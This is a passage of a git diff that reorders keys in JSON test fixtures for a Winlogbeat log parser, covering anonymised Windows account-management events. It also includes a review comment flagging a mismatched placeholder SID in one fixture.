Name:\\t\\tACC_NAME\\n\\tAccount Domain:\\t\\tDOMAIN\"},\"message\":\"A user account was 
enabled.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\taccount-name\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x4A13C3FC\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tACC_NAME\\n\\tAccount Domain:\\t\\tDOMAIN\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"12345678-abcd-90ef-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"task\":\"User Account Management\",\"channel\":\"Security\",\"process\":{\"pid\":756,\"thread\":{\"id\":11608}},\"event_data\":{\"TargetUserName\":\"ACC_NAME\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"account-name\",\"TargetDomainName\":\"DOMAIN\",\"SubjectLogonId\":\"0x4a13c3fc\",\"SubjectUserSid\":\"S-1-2-3\",\"TargetSid\":\"S-1-2-3-4-5\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"PC01.domain.com\",\"record_id\":13042939152,\"event_id\":\"4722\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"PC01\",\"id\":\"12345678-abcd-90ef-1234-abcdef123456\",\"ephemeral_id\":\"11111111-aaaa-2222-bbbb-333333333333\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"pc01\",\"architecture\":\"x86_64\",\"id\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"name\":\"pc01\",\"mac\":[\"AA-BB-CC-DD-EE-FF\"],\"os\":{\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2019 Standard\",\"build\":\"17763.6414\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\"]}}" + } }, "expected": { "message": 
"{\"@timestamp\":\"2024-11-12T08:53:57.535Z\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4722\",\"created\":\"2024-11-12T08:53:58.677Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"A user account was enabled.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\taccount-name\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x4A13C3FC\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tACC_NAME\\n\\tAccount Domain:\\t\\tDOMAIN\"},\"message\":\"A user account was enabled.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\taccount-name\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x4A13C3FC\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tACC_NAME\\n\\tAccount Domain:\\t\\tDOMAIN\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"12345678-abcd-90ef-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"task\":\"User Account 
Management\",\"channel\":\"Security\",\"process\":{\"pid\":756,\"thread\":{\"id\":11608}},\"event_data\":{\"TargetUserName\":\"ACC_NAME\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"account-name\",\"TargetDomainName\":\"DOMAIN\",\"SubjectLogonId\":\"0x4a13c3fc\",\"SubjectUserSid\":\"S-1-2-3\",\"TargetSid\":\"S-1-2-3-4-5\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"PC01.domain.com\",\"record_id\":13042939152,\"event_id\":\"4722\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"PC01\",\"id\":\"12345678-abcd-90ef-1234-abcdef123456\",\"ephemeral_id\":\"11111111-aaaa-2222-bbbb-333333333333\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"pc01\",\"architecture\":\"x86_64\",\"id\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"name\":\"pc01\",\"mac\":[\"AA-BB-CC-DD-EE-FF\"],\"os\":{\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2019 Standard\",\"build\":\"17763.6414\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\"]}}", diff --git a/Beats/winlogbeat/tests/security_event_4723.json b/Beats/winlogbeat/tests/security_event_4723.json index 34874fdfb..ac581308e 100644 --- a/Beats/winlogbeat/tests/security_event_4723.json +++ b/Beats/winlogbeat/tests/security_event_4723.json 
@@ -1,12 +1,12 @@ { "input": { + "message": "{\"@timestamp\":\"2024-11-12T08:59:04.757Z\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4723\",\"created\":\"2024-11-12T08:59:05.295Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"An attempt was made to change an account's password.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x4A28EBBF\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\nAdditional Information:\\n\\tPrivileges\\t\\t-\"},\"message\":\"An attempt was made to change an account's password.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x4A28EBBF\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\nAdditional Information:\\n\\tPrivileges\\t\\t-\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"123456-abcd-ef90-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"task\":\"User Account 
Management\",\"channel\":\"Security\",\"process\":{\"pid\":756,\"thread\":{\"id\":11608}},\"event_data\":{\"PrivilegeList\":\"-\",\"TargetUserName\":\"ACCOUNT\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"ACCOUNT\",\"TargetDomainName\":\"DOMAIN\",\"SubjectLogonId\":\"0x4a28ebbf\",\"SubjectUserSid\":\"S-1-2-3\",\"TargetSid\":\"S-1-2-3\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"PC01.domain.com\",\"record_id\":13043050897,\"event_id\":\"4723\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"PC01\",\"id\":\"123456-abcd-ef90-1234-abcdef123456\",\"ephemeral_id\":\"11111111-aaaa-2222-bbbb-333333333333\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"pc01\",\"architecture\":\"x86_64\",\"id\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"name\":\"pc01\",\"mac\":[\"00-11-22-33-44-55\"],\"os\":{\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2019 Standard\",\"build\":\"17763.6414\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\"]}}", "sekoiaio": { "intake": { "dialect": "Elastic Winlogbeat", "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" } - }, - "message": "{\"@timestamp\":\"2024-11-12T08:59:04.757Z\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4723\",\"created\":\"2024-11-12T08:59:05.295Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"An attempt was made to change an account's password.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x4A28EBBF\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\nAdditional 
Information:\\n\\tPrivileges\\t\\t-\"},\"message\":\"An attempt was made to change an account's password.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x4A28EBBF\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\nAdditional Information:\\n\\tPrivileges\\t\\t-\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"123456-abcd-ef90-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"task\":\"User Account Management\",\"channel\":\"Security\",\"process\":{\"pid\":756,\"thread\":{\"id\":11608}},\"event_data\":{\"PrivilegeList\":\"-\",\"TargetUserName\":\"ACCOUNT\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"ACCOUNT\",\"TargetDomainName\":\"DOMAIN\",\"SubjectLogonId\":\"0x4a28ebbf\",\"SubjectUserSid\":\"S-1-2-3\",\"TargetSid\":\"S-1-2-3\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"PC01.domain.com\",\"record_id\":13043050897,\"event_id\":\"4723\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"PC01\",\"id\":\"123456-abcd-ef90-1234-abcdef123456\",\"ephemeral_id\":\"11111111-aaaa-2222-bbbb-333333333333\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"pc01\",\"architecture\":\"x86_64\",\"id\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"name\":\"pc01\",\"mac\":[\"00-11-22-33-44-55\"],\"os\":{\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2019 
Standard\",\"build\":\"17763.6414\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\"]}}" + } }, "expected": { "message": "{\"@timestamp\":\"2024-11-12T08:59:04.757Z\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4723\",\"created\":\"2024-11-12T08:59:05.295Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"An attempt was made to change an account's password.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x4A28EBBF\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\nAdditional Information:\\n\\tPrivileges\\t\\t-\"},\"message\":\"An attempt was made to change an account's password.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x4A28EBBF\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\nAdditional Information:\\n\\tPrivileges\\t\\t-\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"123456-abcd-ef90-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"task\":\"User Account 
Management\",\"channel\":\"Security\",\"process\":{\"pid\":756,\"thread\":{\"id\":11608}},\"event_data\":{\"PrivilegeList\":\"-\",\"TargetUserName\":\"ACCOUNT\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"ACCOUNT\",\"TargetDomainName\":\"DOMAIN\",\"SubjectLogonId\":\"0x4a28ebbf\",\"SubjectUserSid\":\"S-1-2-3\",\"TargetSid\":\"S-1-2-3\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"PC01.domain.com\",\"record_id\":13043050897,\"event_id\":\"4723\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"PC01\",\"id\":\"123456-abcd-ef90-1234-abcdef123456\",\"ephemeral_id\":\"11111111-aaaa-2222-bbbb-333333333333\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"pc01\",\"architecture\":\"x86_64\",\"id\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"name\":\"pc01\",\"mac\":[\"00-11-22-33-44-55\"],\"os\":{\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2019 Standard\",\"build\":\"17763.6414\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\"]}}", diff --git a/Beats/winlogbeat/tests/security_event_4725.json b/Beats/winlogbeat/tests/security_event_4725.json index 31cca5f97..d3826be97 100644 --- a/Beats/winlogbeat/tests/security_event_4725.json +++ b/Beats/winlogbeat/tests/security_event_4725.json 
@@ -1,12 +1,12 @@ { "input": { + "message": "{\"@timestamp\":\"2024-11-12T08:41:11.055Z\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4725\",\"created\":\"2024-11-12T08:41:11.637Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"A user account was disabled.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tjdoe\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x493FA12D\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\"},\"message\":\"A user account was disabled.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tjdoe\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x493FA12D\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"task\":\"User Account 
Management\",\"channel\":\"Security\",\"process\":{\"pid\":756,\"thread\":{\"id\":7304}},\"event_data\":{\"TargetUserName\":\"ACCOUNT\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"jdoe\",\"TargetDomainName\":\"DOMAIN\",\"SubjectLogonId\":\"0x493fa12d\",\"SubjectUserSid\":\"S-1-2-3\",\"TargetSid\":\"S-4-5-6\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"PC01.domain.com\",\"record_id\":13042691344,\"event_id\":\"4725\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"PC01\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"pc01\",\"architecture\":\"x86_64\",\"id\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"name\":\"pc01\",\"mac\":[\"00-11-22-33-44-55\"],\"os\":{\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2019 Standard\",\"build\":\"17763.6414\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\"]}}", "sekoiaio": { "intake": { "dialect": "Elastic Winlogbeat", "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" } - }, - "message": "{\"@timestamp\":\"2024-11-12T08:41:11.055Z\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4725\",\"created\":\"2024-11-12T08:41:11.637Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"A user account was disabled.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tjdoe\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x493FA12D\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\"},\"message\":\"A user account was disabled.\\n\\nSubject:\\n\\tSecurity 
ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tjdoe\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x493FA12D\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"task\":\"User Account Management\",\"channel\":\"Security\",\"process\":{\"pid\":756,\"thread\":{\"id\":7304}},\"event_data\":{\"TargetUserName\":\"ACCOUNT\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"jdoe\",\"TargetDomainName\":\"DOMAIN\",\"SubjectLogonId\":\"0x493fa12d\",\"SubjectUserSid\":\"S-1-2-3\",\"TargetSid\":\"S-4-5-6\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"PC01.domain.com\",\"record_id\":13042691344,\"event_id\":\"4725\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"PC01\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"pc01\",\"architecture\":\"x86_64\",\"id\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"name\":\"pc01\",\"mac\":[\"00-11-22-33-44-55\"],\"os\":{\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2019 Standard\",\"build\":\"17763.6414\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\"]}}" + } }, "expected": { "message": "{\"@timestamp\":\"2024-11-12T08:41:11.055Z\",\"event\":{\"action\":\"User Account 
Management\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4725\",\"created\":\"2024-11-12T08:41:11.637Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"A user account was disabled.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tjdoe\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x493FA12D\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\"},\"message\":\"A user account was disabled.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tjdoe\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x493FA12D\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"task\":\"User Account 
Management\",\"channel\":\"Security\",\"process\":{\"pid\":756,\"thread\":{\"id\":7304}},\"event_data\":{\"TargetUserName\":\"ACCOUNT\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"jdoe\",\"TargetDomainName\":\"DOMAIN\",\"SubjectLogonId\":\"0x493fa12d\",\"SubjectUserSid\":\"S-1-2-3\",\"TargetSid\":\"S-4-5-6\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"PC01.domain.com\",\"record_id\":13042691344,\"event_id\":\"4725\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"PC01\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"pc01\",\"architecture\":\"x86_64\",\"id\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"name\":\"pc01\",\"mac\":[\"00-11-22-33-44-55\"],\"os\":{\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2019 Standard\",\"build\":\"17763.6414\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\"]}}", diff --git a/Beats/winlogbeat/tests/security_event_4726.json b/Beats/winlogbeat/tests/security_event_4726.json index e147e2eb4..73c1d823c 100644 --- a/Beats/winlogbeat/tests/security_event_4726.json +++ b/Beats/winlogbeat/tests/security_event_4726.json 
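Review bot: The anonymised identifiers in this fixture disagree with each other: the rendered text in `message` / `event.original` gives the target account's Security ID as `S-1-2-3-4-5`, while `winlog.event_data.TargetSid` is `S-4-5-6`. The moved `"message"` line is otherwise a pure key reorder (JSON key order is insignificant), so the test still passes, but if the parser ever falls back to the message body for the target SID the expected value would silently depend on which path wins. Use one placeholder for both, e.g. `\"TargetSid\":\"S-1-2-3-4-5\"` in `event_data`, and carry the same value into the `expected` input. The expected-side field assertions for this test are outside the hunk, so I cannot confirm from here which source the current parser reads.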
@@ -1,12 +1,12 @@ { "input": { + "message": "{\"@version\":\"1\",\"log\":{\"level\":\"information\"},\"@timestamp\":\"2024-11-12T07:58:13.288Z\",\"message\":\"A user account was deleted.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tdoe.j\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x3005C1F76\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tsmithee.a\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\nAdditional Information:\\n\\tPrivileges\\t-\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"code\":\"4726\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"kind\":\"event\",\"created\":\"2024-11-12T07:58:14.553Z\"},\"agent\":{\"hostname\":\"hostname\",\"id\":\"12345678-ABCD-ef90-1234-abcdef123456\",\"type\":\"winlogbeat\",\"name\":\"hostname\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\",\"version\":\"7.17.1\"},\"zone\":\"int\",\"site\":\"site\",\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"channel\":\"Security\",\"process\":{\"pid\":632,\"thread\":{\"id\":2056}},\"event_data\":{\"SubjectLogonId\":\"0x3005c1f76\",\"PrivilegeList\":\"-\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"doe.j\",\"SubjectUserSid\":\"S-1-2-3\",\"TargetSid\":\"S-1-2-3-4-5\",\"TargetUserName\":\"smithee.a\",\"TargetDomainName\":\"DOMAIN\"},\"record_id\":25349190364,\"event_id\":\"4726\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"task\":\"User Account Management\",\"computer_name\":\"hostname.domain.net\"},\"ecs\":{\"version\":\"1.12.0\"},\"host\":{\"name\":\"hostname.domain.net\"},\"tags\":[\"windows\",\"domain-controller\",\"beats_input_codec_plain_applied\"]}", "sekoiaio": { "intake": { "dialect": "Elastic Winlogbeat", "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" } - }, - "message": "{\"@version\":\"1\",\"log\":{\"level\":\"information\"},\"@timestamp\":\"2024-11-12T07:58:13.288Z\",\"message\":\"A user 
account was deleted.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tdoe.j\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x3005C1F76\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tsmithee.a\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\nAdditional Information:\\n\\tPrivileges\\t-\",\"event\":{\"action\":\"User Account 